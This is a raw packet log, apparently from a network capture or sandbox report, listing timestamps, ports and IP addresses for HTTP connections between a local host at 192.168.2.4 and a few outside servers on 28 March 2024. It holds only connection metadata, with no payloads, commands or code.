Mar 28, 2024 09:15:00.024641037 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.024666071 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.024668932 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.024709940 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.024715900 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.024730921 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.024756908 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.024785995 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.024786949 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.024826050 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.024830103 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.024842978 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.024887085 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.024921894 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.024945974 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.024965048 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.024990082 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.024993896 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.025034904 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.025062084 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.025075912 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.025105953 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.025120020 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.025157928 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.025171995 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.025197983 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.025202036 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.025222063 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.025259018 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.025263071 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.025293112 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.025301933 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.025329113 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.025362968 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.025386095 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.025408983 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.025428057 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.025475979 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.025588989 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.025609016 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.025651932 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.025654078 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.025712967 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.025738001 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.025742054 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.025770903 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.025784969 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.025801897 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.025830030 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.025839090 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.025851011 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.025866032 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.025897026 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.025913000 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.025954008 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.025954962 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.025962114 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.025985956 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.025998116 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.026012897 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.026042938 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.026051044 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.026074886 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.026086092 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.026120901 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.026120901 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.026161909 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.026185036 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.026217937 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.026230097 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.026242018 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.026273966 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.026278973 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.026283026 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.026309967 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.026335955 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.026360989 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.026380062 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.026427031 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.026427984 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.026473999 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.026493073 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.026525974 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.026535034 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.026554108 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.026578903 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.026599884 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.026606083 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.026631117 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.026647091 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.026660919 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.026710987 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.026753902 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.026791096 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.026829004 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.026838064 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.026875019 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.026876926 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.026922941 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.026967049 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.026973009 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.026981115 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.027012110 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.027025938 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.027035952 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.027065992 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.027080059 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.027105093 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.027108908 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.027144909 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.027151108 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.027153015 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.027203083 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.027218103 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.027257919 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.027302980 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.027307034 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.027309895 CET	80	49771	93.186.225.194	192.168.2.4
Mar 28, 2024 09:15:00.027354002 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.027358055 CET	80	49771	93.186.225.194	192.168.2.4
Mar 28, 2024 09:15:00.027365923 CET	80	49771	93.186.225.194	192.168.2.4
Mar 28, 2024 09:15:00.027405024 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.027416945 CET	49771	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:15:00.027437925 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.027466059 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.027493000 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.027496099 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.027523041 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.027545929 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.027581930 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.027611971 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.027621031 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.027633905 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.027657032 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.027683020 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.027698040 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.027725935 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.027757883 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.027765036 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.027801991 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.027815104 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.027858019 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.027889967 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.027894020 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.028033018 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.028064013 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.028073072 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.028101921 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.028126001 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.028172016 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.028183937 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.028232098 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.028266907 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.028268099 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.028280973 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.028332949 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.028333902 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.028399944 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.028444052 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.028459072 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.028496027 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.028497934 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.028532982 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.028542042 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.028584003 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.028594971 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.028620005 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.028625965 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.028661013 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.028665066 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.028696060 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.028728008 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.028736115 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.028768063 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.028784037 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.028819084 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.028846979 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.028851986 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.028873920 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.028899908 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.028922081 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.028939962 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.028955936 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.028985977 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.028995037 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.029006004 CET	49771	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:15:00.029020071 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.029052019 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.029068947 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.029103994 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.029129982 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.029172897 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.029184103 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.029215097 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.029225111 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.029249907 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.029284954 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.029311895 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.029325008 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.029350996 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.029371023 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.029409885 CET	49774	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:15:00.029436111 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.029459000 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.029501915 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.029504061 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.029545069 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.029552937 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.029577971 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.029592037 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.029613018 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.029644966 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.029659033 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.029699087 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.029716969 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.029745102 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.029752970 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.029767036 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.029792070 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.029818058 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.029850960 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.029882908 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.029913902 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.029927969 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.029951096 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.029968023 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.029993057 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.030025959 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.030057907 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.030077934 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.030112982 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.030139923 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.030184984 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.030190945 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.030204058 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.030240059 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.030265093 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.030316114 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.030345917 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.030383110 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.030415058 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.030440092 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.030472040 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.030503035 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.030513048 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.030556917 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.030586958 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.030601025 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.030628920 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.030630112 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.030668974 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.030711889 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.030719995 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.030745029 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.030745983 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.030783892 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.030797005 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.030808926 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.030822992 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.030848980 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.030854940 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.030909061 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.030925989 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.030953884 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.030966043 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.030973911 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.031002998 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.031016111 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.031023979 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.031058073 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.031083107 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.031121016 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.031126022 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.031152964 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.031167984 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.031213045 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.031234980 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.031238079 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.031255007 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.031270981 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.031285048 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.031310081 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.031313896 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.031342030 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.031353951 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.031379938 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.031383038 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.031418085 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.031456947 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.031521082 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.031553984 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.031582117 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.031582117 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.031636000 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.031673908 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.031688929 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.031697035 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.031708002 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.031727076 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.031749010 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.031790018 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.031805038 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.031827927 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.031851053 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.031878948 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.031886101 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.031930923 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.031930923 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.031963110 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.031991959 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.032016993 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.032035112 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.032062054 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.032085896 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.032123089 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.032124043 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.032166004 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.032195091 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.032202959 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.032239914 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.032244921 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.032258987 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.032277107 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.032308102 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.032344103 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.032352924 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.032367945 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.032390118 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.032397985 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.032418966 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.032449007 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.032474041 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.032510996 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.032577038 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.032597065 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.032639027 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.032649040 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.032687902 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.032699108 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.032718897 CET	80	49734	195.20.16.46	192.168.2.4
